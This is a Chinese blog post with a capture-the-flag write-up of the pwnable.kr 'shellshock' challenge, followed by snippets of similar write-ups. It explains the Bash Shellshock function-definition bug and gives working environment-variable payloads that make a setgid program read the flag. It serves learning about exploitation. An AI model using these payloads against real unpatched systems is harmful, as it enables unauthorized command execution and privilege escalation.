pwnable.kr [shellshock]

最新推荐文章于 2022-10-03 20:29:34 发布
最新推荐文章于 2022-10-03 20:29:34 发布
阅读量289 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: 个人知识管理
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/shisuan1/article/details/84929291
本文详细介绍了如何利用Shellshock漏洞在pwnable.kr上获取shell。通过构造特定payload,使Bash执行任意命令,绕过权限限制读取flag。文章深入分析了漏洞原理,并给出了具体的payload构造方法。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

pwnable.kr [shellshock]

Mommy, there was a shocking news about bash.
I bet you already know, but lets just make it sure ?
ssh shellshock@pwnable.kr -p2222 (pw:guest)

此题使用破壳漏洞。

目前的Bash使用的环境变量是通过函数名称来调用的,导致漏洞出问题是以“(){”开头定义的环境变量在命令ENV中解析成函数后,Bash执行并未退出,而是继续解析并执行shell命令。而其核心的原因在于在输入的过滤中没有严格限制边界,也没有做出合法化的参数判断。

payload 构造方法

x=' () {:;}; cmd para  ' cmd para

cmd para处的代码会被执行。
但当前用户无读取权限
但是shellshock.c如下

#include <stdio.h>
int main(){
        setresuid(getegid(), getegid(), getegid());
        setresgid(getegid(), getegid(), getegid());
        system("/home/shellshock/bash -c 'echo shock_me'");
        return 0;
}

同时观察权限
在这里插入图片描述
可以看到shellshock 文件设置了SGID权限,即执行的时候获得文件用户组的权限支持。
此文件将当前的进程的用户改为了用户组,把进程的权限也改为了用户组。这时执行此程序时再设置payload即可
然后将payload改为

x='() { :;}; bash -c "cat flag" ' ./shellshock
每日一题pwnable.kr shellshock
Kni9hT's Blog
09-04 475
Bash远程执行漏洞“破壳” [注:bash版本要在4.1以下] bash引自维基百科的描述为: "bash,Unix shell的一种。1989年发布第一个正式版本,原先是计划用在 GNU操作系统上,但能运行于大多数类Unix系统的操作系统之上,包括Linux与Mac OS X v10.4都将它作为默认shell。它也被移植到Microsoft Windows上的Cygwin与MinGW,或...
Lab-03--Shellshock.zip
12-22
Shellshock漏洞详解及其在Linux环境下的防范》 Shellshock漏洞,全名是BASH(Bourne Again SHell)漏洞,是2014年9月被发现的一个严重安全漏洞,影响了广泛使用的Unix/Linux操作系统及基于这些系统的服务器、路由器...
pwnable.krshellshock
river
05-04 1149
shellshock 登陆上服务器看到有shellshock文件,还有一个bash文件,执行./shellshock shellshock不是CVE-20146271吗? 根据搜到的结果进行测试: 正常执行过程分析 Bash有一种独有的使用环境变量来定义函数的方法。如果环境变量的值以字符”(){”开头,那么这个变量就会被当作是一个导
pwnable.krshellshock
weixin_30284355的博客
07-05 163
pwnable从入门到放弃,第五题。 ssh shellshock@pwnable.kr -p2222 (pw:guest) 这题主要涉及了一个关于bash的CVE漏洞。 首先还是下载源代码审计一下,shellshock.c #include <stdio.h> int main(){ setresuid(getegid(), getegid()...
pwnable.krshellshock
搓雪小怪兽的工作室
09-19 761
关于权限 一些名词如下: 缩写 全程 含义 RUID real user ID 启动该进程的用的id EUID Effective User ID 在内核检查权限的时候使用的(只有在设置了执行时设置用户id位才会与ruid区别) SSUID saved set user ID 保存的设置用户id,是程序所有者的id 比如一个程序的所有者为admin,现在guest用户执...
Bash漏洞——Shellshock浅析.pdf
07-10
【Bash漏洞——Shellshock浅析】 Bash漏洞,又称Shellshock,是指在2014年被发现的一个严重安全漏洞,它影响了广泛使用的Bash shell,这是一个在Unix-like操作系统,包括Linux和Mac OS X中的命令行解释器。这个漏洞...
Bash漏洞-Shellshock浅析.pdf
07-10
【Bash漏洞与Shellshock】 Bash漏洞,又称为Shellshock,是指在2014年发现的一种严重安全漏洞,影响了广泛使用的Bash shell程序。Bash是Unix-like操作系统,包括Linux和Mac OS X的默认命令行解释器。这个漏洞的存在...
shellshock
12-10
shellshock代码,网页形式,看起来不错,需要到可以试试哦。
[pwnable.kr]shellshock
iekuil的博客
10-03 261
可以看到这里对() {开头的字符串没有太多检查就传给了parse_and_execute,而直接用bash会从环境变量PATH里面找系统默认的bash,而这个bash是没有漏洞的。靶场环境当前目录下的bash才是有漏洞的bash,调用时需要用./bash。2.需要有能够执行的高权限的程序,并且程序中存在启动bash子进程的操作。跟着网上的分析简单看了一下bash 4.3的varieble.c文件,就是之前的几个题都可以直接以文件名运行文件,可惜定义的很多东西不清楚干啥用的,测试的时候又把前面的坑踩了一次,
[WriteUp] pwnable.kr -- [shellshock]
qq_23026851的博客
07-31 527
题目: 解: 登录 检测是否存在shellshock漏洞: 上图有意思的地方在于,当输入“bash”时,没有触发shellshock漏洞;而“./bash”则触发了。究其原因,该服务器默认的bash程序没有shellshock漏洞,而当前目录下的这个vulnerable的“bash”是供我们练习专用的。 Shellshock的原理已经被探讨了很多,简单总结一下就是,当环境变量X被如此...
pwnable.kr-----解题过程】shellshock
lyuchen65的博客
09-16 1286
#include int main(){ setresuid(getegid(), getegid(), getegid()); setresgid(getegid(), getegid(), getegid()); system("/home/shellshock/bash -c 'echo shock_me'"); return 0; }根据题目一下子可以看出来这是shellshoc
pwnable.kr-shellshock WP
Casuall的博客
05-08 384
这道题涉及的知识点是shellshock(也叫破壳漏洞)CVE-2014-6271,GNU Bash 版本小于等于4.3可能存在这个漏洞。首先查看一下有什么文件 发现目录里有一个可执行文件bash,我们来查看一下bash的版本 可以看到这个路径中的bash版本低于4.3,下面来测试一下这两个版本的bash是否存在破壳漏洞 env x='() { :;}; echo shellshocked' ...
pwnable.kr shellshock wp
Pz_mstr's Blog
12-19 236
0x01 shellshock CVE-2014-6271 attack 0x02 principles https://blog.csdn.net/qq_27180763/article/details/88049178 0x03 payload export foo='() { :; }; ./bash' ./shellshock cat flag 0x04 flag shellshock@...
pwnable.kr --- shellshock题解(bash破壳漏洞)
Yannie's Blog
12-17 358
程序代码如下 #include &amp;amp;lt;stdio.h&amp;amp;gt; int main(){ setresuid(getegid(), getegid(), getegid()); setresgid(getegid(), getegid(), getegid()); system(&amp;quot;/home/shellshock/bash -c 'echo shock...
pwn_able(shellcode+系统调用)
weixin_61283545的博客
06-16 270
详细复现一下整个程序流程1大段是程序开始之前的准备工作,压入esp和exit之后使ax,bx,cx,dx变0,之后压入数据,具体的话gdb调试可以看到就是提示的那些语句。2大段就是系统调用的write函数,压栈顺序依次从in0x80开始从下到上为ax,bx=fd=1,cx=addr=1打断开始压入栈中esp里压入的数据。dx=length=0x143大段同2同理就为read函数,注意倒数两行的为了栈平衡结束后add sp0x14由此我们可以知道buf为0x14,同时结尾只有retn没有leave所以无需填充
pwnable.kr shellshock
r250414958的博客
08-04 218
看一下题目 连上去看看有什么 看下shellshock.c #include <stdio.h> int main(){ setresuid(getegid(), getegid(), getegid()); setresgid(getegid(), getegid(), getegid()); system("/home/shellshock/bash -c 'echo s...
通过pwnable.kr从零学pwn
热门推荐
giantbranch的专栏
07-31 1万+
本文链接:http://blog.csdn.net/u012763794/article/details/51992512 下面的这个地址很多ctf的学习资源都是有推荐的 挑战地址:http://pwnable.kr/play.php fd 首先不用说给了就直接连上去 看一下代码 重要函数:read ssize_t read(int fd,void *
pwnable.kr 简单题目详细笔记汇总
H4ppyD0g的博客
09-12 1334
pwnable.kr fd pwnable.kr collision pwnable.kr bof pwnable.kr flag pwnable.kr passcode pwnable.kr random pwnable.kr input pwnable.kr leg pwnable.kr mistake pwnable.kr shellshock pwnable.kr coin1 pwnable.kr lotto pwnable.kr cmd1 pwnable.kr cmd2 pwnable.kr u
红帽系统修复破壳漏洞,发布最新ShellShock补丁
破壳漏洞(ShellShock)是2014年公开披露的一个严重的安全漏洞,该漏洞存在于GNU Bash中,它是一种广泛用于Linux和Unix系统上的shell程序。ShellShock漏洞允许攻击者远程执行代码,从而完全控制受影响的系统。在此次...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值